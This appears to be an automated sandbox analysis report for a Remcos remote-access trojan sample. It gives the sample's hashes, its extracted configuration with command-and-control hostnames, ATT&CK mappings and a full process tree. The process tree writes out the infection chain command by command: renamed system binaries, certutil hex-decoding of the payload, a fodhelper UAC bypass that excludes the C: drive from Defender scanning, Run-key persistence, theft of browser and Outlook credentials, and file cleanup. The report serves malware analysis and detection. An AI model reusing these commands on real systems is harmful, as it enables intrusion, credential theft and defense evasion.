remcos | b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c

Analysis

max time kernel
149s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd
Size

2.4MB
MD5

2acd509e492f212f252113b8a572657c
SHA1

281f0f0f9bc8af9e060417fb1c593962877687a0
SHA256

b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c
SHA512

68ff228e57ac79774e9c2a88f0dee6cd3a63c02f3d9b4c93cda089fad70309d87df0ac9e3795849313b6455c6e168363e378607114380fbececb9a989c63054b
SSDEEP

24576:vu6hz/Ca7b8Olc80Ck06GIUEyoaPjyeNwVEULLD2XCn+RCN1DVkY67:vuAbCasOl/nk0AyXjRYVLC7

Score

10^/10

remcos takerwol collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

TAKERWOL

taker202.ddns.net:3017

taker202.duckdns.org:5033

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
xmnw-WRH3KW
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/2028-122-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral2/memory/2028-119-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2960-103-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral2/memory/2960-121-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/768-105-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/768-104-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/768-111-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2960-103-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2028-122-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/2960-121-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2028-119-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

per.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation per.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 28 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exePing_c.pifPing_c.pifPing_c.pif

pid	process
3472	alpha.exe
3204	alpha.exe
528	alpha.exe
388	alpha.exe
4332	kn.exe
4068	alpha.exe
324	alpha.exe
1704	alpha.exe
4656	alpha.exe
4684	xkn.exe
2240	alpha.exe
4360	ger.exe
1440	alpha.exe
4852	kn.exe
1256	per.exe
1212	alpha.exe
1704	Ping_c.pif
3672	alpha.exe
2276	alpha.exe
1924	alpha.exe
3748	alpha.exe
3840	alpha.exe
3468	alpha.exe
3780	alpha.exe
2192	alpha.exe
2960	Ping_c.pif
768	Ping_c.pif
2028	Ping_c.pif

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

Ping_c.pif

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Ping_c.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Ping_c.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mwsmvhhv = "C:\\Users\\Public\\Mwsmvhhv.url"	Ping_c.pif

Suspicious use of SetThreadContext 3 IoCs

Processes:

Ping_c.pif

description	pid	process	target process
PID 1704 set thread context of 2960	1704	Ping_c.pif	Ping_c.pif
PID 1704 set thread context of 2028	1704	Ping_c.pif	Ping_c.pif
PID 1704 set thread context of 768	1704	Ping_c.pif	Ping_c.pif

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4812 taskkill.exe

pid	process
4812	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

xkn.exePing_c.pifPing_c.pif

pid process

4684 xkn.exe
4684 xkn.exe
4684 xkn.exe
2960 Ping_c.pif
2960 Ping_c.pif
768 Ping_c.pif
768 Ping_c.pif
2960 Ping_c.pif
2960 Ping_c.pif
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

Ping_c.pif

pid process

1704 Ping_c.pif
1704 Ping_c.pif
1704 Ping_c.pif
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exePing_c.pif

description pid process

Token: SeDebugPrivilege 4684 xkn.exe
Token: SeDebugPrivilege 4812 taskkill.exe
Token: SeDebugPrivilege 768 Ping_c.pif
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Ping_c.pif

pid process

1704 Ping_c.pif

pid	process
4684	xkn.exe
4684	xkn.exe
4684	xkn.exe
2960	Ping_c.pif
2960	Ping_c.pif
768	Ping_c.pif
768	Ping_c.pif
2960	Ping_c.pif
2960	Ping_c.pif

pid	process
1704	Ping_c.pif
1704	Ping_c.pif
1704	Ping_c.pif

description	pid	process
Token: SeDebugPrivilege	4684	xkn.exe
Token: SeDebugPrivilege	4812	taskkill.exe
Token: SeDebugPrivilege	768	Ping_c.pif

pid	process
1704	Ping_c.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pif

description	pid	process	target process
PID 2512 wrote to memory of 1864	2512	cmd.exe	extrac32.exe
PID 2512 wrote to memory of 1864	2512	cmd.exe	extrac32.exe
PID 2512 wrote to memory of 3472	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3472	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3204	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3204	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 528	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 528	2512	cmd.exe	alpha.exe
PID 528 wrote to memory of 2724	528	alpha.exe	extrac32.exe
PID 528 wrote to memory of 2724	528	alpha.exe	extrac32.exe
PID 2512 wrote to memory of 388	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 388	2512	cmd.exe	alpha.exe
PID 388 wrote to memory of 4332	388	alpha.exe	kn.exe
PID 388 wrote to memory of 4332	388	alpha.exe	kn.exe
PID 2512 wrote to memory of 4068	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 4068	2512	cmd.exe	alpha.exe
PID 4068 wrote to memory of 4512	4068	alpha.exe	extrac32.exe
PID 4068 wrote to memory of 4512	4068	alpha.exe	extrac32.exe
PID 2512 wrote to memory of 324	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 324	2512	cmd.exe	alpha.exe
PID 324 wrote to memory of 2380	324	alpha.exe	extrac32.exe
PID 324 wrote to memory of 2380	324	alpha.exe	extrac32.exe
PID 2512 wrote to memory of 1704	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 1704	2512	cmd.exe	alpha.exe
PID 1704 wrote to memory of 800	1704	alpha.exe	extrac32.exe
PID 1704 wrote to memory of 800	1704	alpha.exe	extrac32.exe
PID 2512 wrote to memory of 4656	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 4656	2512	cmd.exe	alpha.exe
PID 4656 wrote to memory of 4684	4656	alpha.exe	xkn.exe
PID 4656 wrote to memory of 4684	4656	alpha.exe	xkn.exe
PID 4684 wrote to memory of 2240	4684	xkn.exe	alpha.exe
PID 4684 wrote to memory of 2240	4684	xkn.exe	alpha.exe
PID 2240 wrote to memory of 4360	2240	alpha.exe	ger.exe
PID 2240 wrote to memory of 4360	2240	alpha.exe	ger.exe
PID 2512 wrote to memory of 1440	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 1440	2512	cmd.exe	alpha.exe
PID 1440 wrote to memory of 4852	1440	alpha.exe	kn.exe
PID 1440 wrote to memory of 4852	1440	alpha.exe	kn.exe
PID 2512 wrote to memory of 1256	2512	cmd.exe	per.exe
PID 2512 wrote to memory of 1256	2512	cmd.exe	per.exe
PID 2512 wrote to memory of 1212	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 1212	2512	cmd.exe	alpha.exe
PID 1212 wrote to memory of 4812	1212	alpha.exe	taskkill.exe
PID 1212 wrote to memory of 4812	1212	alpha.exe	taskkill.exe
PID 2512 wrote to memory of 1704	2512	cmd.exe	Ping_c.pif
PID 2512 wrote to memory of 1704	2512	cmd.exe	Ping_c.pif
PID 2512 wrote to memory of 1704	2512	cmd.exe	Ping_c.pif
PID 2512 wrote to memory of 3672	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3672	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 2276	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 2276	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 1924	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 1924	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3748	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3748	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3840	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3840	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3468	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3468	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3780	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 3780	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 2192	2512	cmd.exe	alpha.exe
PID 2512 wrote to memory of 2192	2512	cmd.exe	alpha.exe
PID 1704 wrote to memory of 2248	1704	Ping_c.pif	extrac32.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:1864
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:3472
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:528
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:2724
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:388
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\b674ad0e45e6f4c347e8059af90394c05163e28613694bc57c5284f482faf88c.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
    3⤵
    - Executes dropped EXE
    PID:4332
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    PID:4512
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:324
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    PID:2380
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    PID:800
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4656
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2240
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4360
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    3⤵
    - Executes dropped EXE
    PID:4852
- C:\Windows \System32\per.exe
  "C:\\Windows \\System32\\per.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1256
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- C:\Users\Public\Libraries\Ping_c.pif
  C:\Users\Public\Libraries\Ping_c.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Mwsmvhhv.PIF
    3⤵
    PID:2248
- - C:\Users\Public\Libraries\Ping_c.pif
    C:\Users\Public\Libraries\Ping_c.pif /stext "C:\Users\Admin\AppData\Local\Temp\qmrutyxfzxelsomdenabplxawqy"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2960
- - C:\Users\Public\Libraries\Ping_c.pif
    C:\Users\Public\Libraries\Ping_c.pif /stext "C:\Users\Admin\AppData\Local\Temp\boxmurizngwyucahnyndaykrxwiaab"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook accounts
    PID:2028
- - C:\Users\Public\Libraries\Ping_c.pif
    C:\Users\Public\Libraries\Ping_c.pif /stext "C:\Users\Admin\AppData\Local\Temp\licxmjttboodfioteiaeddeifdajtmray"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:3672
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:2276
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:1924
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3748
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3840
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3468
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3780
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2192

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:2736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4004,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3804 /prefetch:8
1⤵
PID:512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
816d8adc9cdbb643ada9523968b86228

SHA1
041d240610257af781aa0c76f4d0b8dcf41c8f04

SHA256
d21d32d21b164e53771bbd5b60695bd25acd8e615fc7f7615c4087bd12f3f620

SHA512
f11c33955f3afddd601df788d3c06274900768dab6437bea086ab734dd06c9abc477a1fd4d2b1e19efedd84b428f5c732e61cf48e569dbcfd1310303f9665025

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z5lyx2jt.lpw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qmrutyxfzxelsomdenabplxawqy

Filesize
4KB

MD5
91227a2f05c7f74f6ebd1535a3f05b7b

SHA1
1ce317a272d67e3ac284948e49e6bc0acaee2e6d

SHA256
2967c8bcad47ab6cb88bf5b60a3a75b49f471a943d33c9b69aa7bfe1b763cfd2

SHA512
9ff9f6d2fb2880812fce42b91388e8b825483bb2df0976b9c630c397fed68f3625f4ba32d65933de0018b6e18554315152a1df00c98313d19612403076079a40

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
805KB

MD5
8cd46fdaaf913a77e8d4602aaef6151a

SHA1
276cb976909b2295e3416284efa512bc56edb23e

SHA256
980a0acdae47a216c67f61b242060890464e58c3a25a6903241ab8aebcbf434d

SHA512
587ff6d237330a615a9178f5d8ba348bf1282058debe1abefb2c4022567786efe12e3a9ab7a5f706332dada5a4a94808a4259e307244562d68e691d4032cc08b

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
1.6MB

MD5
d6fd0173f9ff47262d558e3022ced522

SHA1
5191843a6af9afedf85c1bd86fbf4350e3bcf1d4

SHA256
d1fa0ef2bf6519de2b67a5177626e86b92acb759182cfa8e722df134288e4b56

SHA512
6a22ae6c315100097d8eb3c08fb4093f2541a78b326e4474c0e06c5f0e8ec09ffdc4363c4454897961d61e8688322eccfbe896f1a1ff79466d1b76295d13ea71

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/768-102-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/768-99-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/768-111-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/768-106-0x0000000000430000-0x00000000004F9000-memory.dmp

Filesize
804KB

Download
memory/768-104-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/768-105-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1704-85-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-94-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-92-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-179-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-90-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-89-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-87-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-86-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-84-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-91-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-81-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-146-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-178-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-156-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-145-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-157-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-167-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-135-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-75-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/1704-126-0x00000000522D0000-0x00000000522E9000-memory.dmp

Filesize
100KB

Download
memory/1704-130-0x00000000522D0000-0x00000000522E9000-memory.dmp

Filesize
100KB

Download
memory/1704-129-0x00000000522D0000-0x00000000522E9000-memory.dmp

Filesize
100KB

Download
memory/1704-131-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

Download
memory/1704-134-0x00000000336B0000-0x00000000346B0000-memory.dmp

Filesize
16.0MB

